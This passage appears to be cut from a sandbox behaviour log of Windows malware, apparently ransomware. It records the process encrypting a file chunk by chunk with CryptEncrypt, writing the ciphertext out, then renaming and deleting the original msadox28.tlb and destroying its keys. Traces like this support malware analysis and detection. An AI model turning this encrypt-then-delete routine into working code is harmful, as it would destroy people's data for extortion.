pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.218] GetLastError () returned 0x0 [0168.218] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.218] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.218] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.218] GetLastError () returned 0x0 [0168.218] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.218] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.218] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.218] GetLastError () returned 0x0 [0168.218] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.218] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.218] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.218] GetLastError () returned 0x0 [0168.218] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.218] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.218] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.218] GetLastError () returned 0x0 [0168.218] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.218] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.218] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.218] GetLastError () returned 0x0 [0168.218] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.219] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.219] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.219] GetLastError () returned 0x0 [0168.219] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.219] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.219] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.219] GetLastError () returned 0x0 [0168.219] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.219] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.219] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.219] GetLastError () returned 0x0 [0168.219] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.219] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.219] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.219] GetLastError () returned 0x0 [0168.219] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.219] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.219] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.219] GetLastError () returned 0x0 [0168.219] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.219] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.219] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.219] GetLastError () returned 0x0 [0168.219] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.220] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.220] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.220] GetLastError () returned 0x0 [0168.220] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.220] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.220] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.220] GetLastError () returned 0x0 [0168.220] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.220] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.220] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.220] GetLastError () returned 0x0 [0168.220] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.220] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.220] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.220] GetLastError () returned 0x0 [0168.220] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.220] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.220] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.220] GetLastError () returned 0x0 [0168.220] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.220] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.220] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.220] GetLastError () returned 0x0 [0168.220] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.220] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.220] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.221] GetLastError () returned 0x0 [0168.221] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.221] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.221] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.221] GetLastError () returned 0x0 [0168.221] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.221] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.221] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.221] GetLastError () returned 0x0 [0168.221] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.221] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.221] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.221] GetLastError () returned 0x0 [0168.221] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.221] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.221] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.221] GetLastError () returned 0x0 [0168.221] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.221] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.221] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.221] GetLastError () returned 0x0 [0168.221] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.221] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.221] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.221] GetLastError () returned 0x0 [0168.221] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.221] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.222] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.222] GetLastError () returned 0x0 [0168.222] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.222] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.222] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.222] GetLastError () returned 0x0 [0168.222] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.222] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.222] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.222] GetLastError () returned 0x0 [0168.222] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.222] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.222] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x110) returned 1 [0168.222] GetLastError () returned 0x0 [0168.222] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x110, lpOverlapped=0x0) returned 1 [0168.222] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x0, lpOverlapped=0x0) returned 1 [0168.222] WriteFile (in: hFile=0x15c4, lpBuffer=0x2882928*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesWritten=0x2d7e63c*=0x0, lpOverlapped=0x0) returned 1 [0168.222] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadox28.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msadox28.tlb")) returned 0x20 [0168.222] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadox28.tlb", dwFileAttributes=0x20) returned 0 [0168.223] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadox28.tlb") returned 1 [0168.223] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadox28.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msadox28.tlb")) returned 0 [0168.223] wcscpy (in: _Dest=0x2d7e194, _Source="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadox28.tlb" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadox28.tlb") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadox28.tlb" [0168.223] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadox28.tlb" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\System\\ado") returned 1 [0168.223] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7e39c | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\.xX4AD.tmp" (normalized: "c:\\program files\\common files\\system\\ado\\.xx4ad.tmp")) returned 0x4ad [0168.224] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadox28.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msadox28.tlb"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\.xX4AD.tmp" (normalized: "c:\\program files\\common files\\system\\ado\\.xx4ad.tmp"), dwFlags=0x1) returned 0 [0168.224] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\.xX4AD.tmp" (normalized: "c:\\program files\\common files\\system\\ado\\.xx4ad.tmp")) returned 1 [0168.224] CryptDestroyKey (hKey=0x9ad2f8) returned 1 [0168.224] wcslen (_String="OK") returned 0x2 [0168.224] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0168.224] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0168.224] CryptDestroyKey (hKey=0x9ad438) returned 1 [0168.224] CryptDestroyHash (hHash=0x9ad1f8) returned 1 [0168.224] CryptReleaseContext (hProv=0x8e2de0, 